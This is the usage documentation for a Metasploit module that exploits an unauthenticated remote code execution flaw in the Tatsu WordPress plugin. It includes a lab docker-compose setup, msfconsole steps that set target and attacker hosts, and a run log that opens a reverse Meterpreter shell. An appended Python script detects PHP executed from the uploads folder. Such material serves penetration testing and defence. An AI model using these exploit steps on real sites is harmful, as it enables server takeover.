## Vulnerable Application

This module exploits an unauthenticated remote code execution vulnerability in the Tatsu plugin for WordPress. The vulnerable version is below 3.3.11. The module uploads a malicious zip file containing a PHP payload, which gets parsed and unzipped into the WordPress upload directory. The module then triggers the payload by sending a request with the payload directory as the URI.

The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)

## Verification Steps

1. Install the application

1.1 Create `docker-compose.yml`

```yaml
services:
  wordpress:
    image: wordpress:6.3.2
    restart: always
    ports:
      - 5555:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: ms
      WORDPRESS_DB_PASSWORD: supersecret
      WORDPRESS_DB_NAME: proof_of_concept
    volumes:
      - wordpress:/var/www/html
      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: proof_of_concept
      MYSQL_USER: ms
      MYSQL_PASSWORD: supersecret
      MYSQL_ROOT_PASSWORD: supersecret
    volumes:
      - db:/var/lib/mysql

volumes:
  wordpress:
  db:
```

1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)

1.3 Install the plugin in the WordPress admin portal

2. `msfconsole`
3. `use multi/http/wp_tatsu_rce`
4. `set RHOST [target IP]`
5. `set RPORT [target PORT]`
6. `set LHOST [attacker's IP]`
7. `set LPORT [attacker's port]`

## Options

## Scenarios

Vulnerable version is <= 3.3.11.

```
msf exploit(multi/http/wp_tatsu_rce) > run
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Sending stage (40004 bytes) to 172.18.0.2
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer    : ff0d55ec29bf
OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
Meterpreter : php/linux
meterpreter >
```
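
A defender-side check for the behaviour described under Vulnerable Application (a PHP payload unzipped into the WordPress upload directory, then requested by URI). This is an added example, not part of the module or its original documentation. It assumes the default `/wp-content/uploads/` URL path, combined-format access logs, and a hypothetical list of PHP-handled extensions; the log lines are constructed.

```python
import os
import re
from urllib.parse import unquote, urlsplit

# Extensions assumed to be mapped to the PHP handler; match your server config.
PHP_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7", ".pht")
UPLOADS_PREFIX = "/wp-content/uploads/"  # WordPress default uploads URL path

# Common/combined log format: ip - - [ts] "METHOD uri HTTP/x" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_php_in_uploads(uploads_root):
    """Return relative paths of PHP-executable files under the uploads tree."""
    hits = []
    for dirpath, _dirs, files in os.walk(uploads_root):
        for name in files:  # os.walk also yields dot-files and dot-directories
            if name.lower().endswith(PHP_EXTS):
                full = os.path.join(dirpath, name)
                hits.append(os.path.relpath(full, uploads_root))
    return sorted(hits)


def flag_upload_execution(log_lines):
    """Return (client, method, path, status) for PHP requests under uploads."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, uri, status = m.groups()
        path = unquote(urlsplit(uri).path)  # drop query string, decode %xx
        if path.startswith(UPLOADS_PREFIX) and path.lower().endswith(PHP_EXTS):
            flagged.append((client, method, path, int(status)))
    return flagged


# Constructed sample log lines (not from the original page).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jun/2025:18:59:30 +0200] "GET /wp-content/uploads/2025/06/logo.png HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '203.0.113.7 - - [11/Jun/2025:18:59:35 +0200] "GET /wp-content/uploads/example/a.PHP?x=1 HTTP/1.1" 200 0 "-" "curl/8.0"',
    '198.51.100.4 - - [11/Jun/2025:19:00:01 +0200] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in flag_upload_execution(SAMPLE_LOG):
        print("suspicious request:", hit)
```

Any hit from either function warrants review, since a stock WordPress uploads tree holds media files rather than PHP; disabling PHP execution for the uploads directory in the web server configuration closes the trigger step independently of the plugin version.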